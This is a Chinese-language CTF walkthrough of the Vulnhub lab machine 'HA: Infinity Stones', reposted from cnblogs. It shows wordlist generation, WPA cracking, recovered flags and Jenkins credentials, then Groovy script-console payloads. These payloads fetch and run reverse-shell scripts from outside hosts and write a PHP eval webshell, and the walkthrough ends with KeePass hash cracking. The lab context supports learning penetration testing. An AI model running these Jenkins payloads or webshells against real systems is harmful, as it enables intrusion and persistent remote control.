经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
HA: Infinity Stones Vulnhub Walkthrough - APT-101
来源:cnblogs  作者:APT-101  时间:2019/9/24 8:48:07  对本文有异议

下载地址:

https://www.vulnhub.com/entry/ha-infinity-stones,366/

主机扫描:

 

 

 

 

目录枚举

 

 

 

 

 

 

我们按照密码规则生成字典:gam,%%@@2012

crunch 12 12 -t gam,%%@@2012 -o dict.txt

 

 

╰─ aircrack-ng -w dict.txt reality.cap 

gamA00fe2012

 

 

http://10.10.202.134/gamA00fe2012/realitystone.txt

REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

http://10.10.202.134/aether.php

 

 

 

答案的结果为:01101001

http://10.10.202.134/01101001/hints.txt

 

 

解密的字符串,我们进行解密下:

这里为脑干算法

http://ctf.ssleye.com/brain.html

 

 

okay获取了账户密码,我们登录下8080端口的Jenkins,尝试shell反弹

admin:avengers

 

 

这里尝试script console反弹shell无法成功

println "wget http://10.10.202.132/shell.py -P /tmp/".execute().text
println "python /tmp/shell.py".execute().text

具体方法:

直接wget下载back.py反弹shell,如下:
println "wget http://www.nxadmin.com/tools/back.py -P /tmp/".execute().text
println "python /tmp/back.py 10.1.1.111 8080".execute().text

2)多种写webshell方法,如下:
1.wget写webshell
println "wget http://shell.nxadmin.com/data/t.txt -o /var/www/html/media.php".execute().text

2.new File("/var/www/html/media.php").write('<?php @eval($_POST[s3cpu1se]);?>');

3.def webshell = '<?php @eval($_POST[s3cpu1se]);?>'
new File("/var/www/html/media.php").write("$webshell");

4.追加法写webshell
def execute(cmd) {
def proc = cmd.execute()
proc.waitFor()
}
execute( [ 'bash', '-c', 'echo -n "<?php @eval($" > /usr/local/nginx_1119/html/media.php' ] )
execute( [ 'bash', '-c', 'echo "_POST[s3cpu1se]);?>" >> /usr/local/nginx_1119/html/media.php' ] )

 

这里使用调用后台API进行反弹shell

 

 

python3 -c 'import pty;pty.spawn("/bin/bash")'

 

 

http://10.10.202.134/gamA00fe2012/realitystone.txt

 

好像是加过密了,我们尝试解密看看

 

╰─ keepass2john morag.kdbx > morag.hash

╰─ cat morag.hash
morag:$keepass$*2*60000*222*ad52c2bc4d6e8f1aad80c53c3aa8c89cd010a2b06be6e9fc18339fc03f62b025*955d58975ce2542fbcc0e7d8b0a70df4eeadb12f02ca2be7b3c0c2dfe08766d9*ee9d589925b32d8a502d92252079ebef*6bdf7df906c8e9e51d24e9249c7a5356face1d19cc475bdd3024802e1134c32a*4112e70f66d462b734768ade8950f0157b8eb3748c571be886f891f9c906b1b0

破解获取密文为:princesa

 

 

 

 

 

 

 

OVER!

 

原文链接:http://www.cnblogs.com/hack404/p/11563399.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号